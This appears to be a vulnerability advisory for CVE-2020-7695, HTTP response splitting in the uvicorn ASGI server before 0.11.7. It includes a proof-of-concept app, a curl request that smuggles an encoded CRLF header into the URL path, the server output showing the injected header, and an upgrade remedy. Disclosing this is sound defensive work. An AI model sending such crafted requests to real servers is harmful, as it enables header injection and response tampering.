HTTP Response Splitting

Affecting uvicorn package, versions [,0.11.7)

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

uvicorn is a lightning-fast ASGI server.

Affected versions of this package are vulnerable to HTTP Response Splitting. Uvicorn's implementation of the HTTP protocol for the httptools parser is vulnerable to HTTP response splitting. CRLF sequences are not escaped in the value of HTTP headers. Attackers can exploit this to add arbitrary headers to HTTP responses, or even return an arbitrary response body, whenever crafted input is used to construct HTTP headers.

PoC

async def app(scope, receive, send):
    assert scope['type'] == 'http'
    await send({
        'type': 'http.response.start',
        'status': 200,
        'headers': [
            [b'Content-Type', b'text/plain'],
            [b'Referer', scope['path'].encode()],
        ]
    })  
    await send({
        'type': 'http.response.body',
        'body': b'Hello, world!',
    })

uvicorn poc-3:app --port 9999 --http httptools


To exploit this vulnerability, make a GET request with a crafted URL path like so:


curl -v 'http://localhost:9999/foo%0d%0abar:%20baz'

Uvicorn will return an additional HTTP header "bar" with the value "baz":

* Trying 127.0.0.1...
* Connected to localhost (127.0.0.1) port 9999 (#0)
> GET /foo%0d%0abar:%20baz HTTP/1.1
> Host: localhost:9999
> User-Agent: curl/7.58.0
> Accept: */*
>

< HTTP/1.1 200 OK
< date: Sun, 26 Apr 2020 22:38:18 GMT
< server: uvicorn
< content-type: text/plain
< referer: /foo
< bar: baz
< transfer-encoding: chunked
<

Remediation

Upgrade uvicorn to version 0.11.7 or higher.

References

CVSS Score

5.3
medium severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    None
  • Integrity
    Low
  • Availability
    None
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:U/RC:C
Credit
Everardo Padilla Saca
CVE
CVE-2020-7695
CWE
CWE-113
Snyk ID
SNYK-PYTHON-UVICORN-570471
Disclosed
10 Jul, 2020
Published
20 Jul, 2020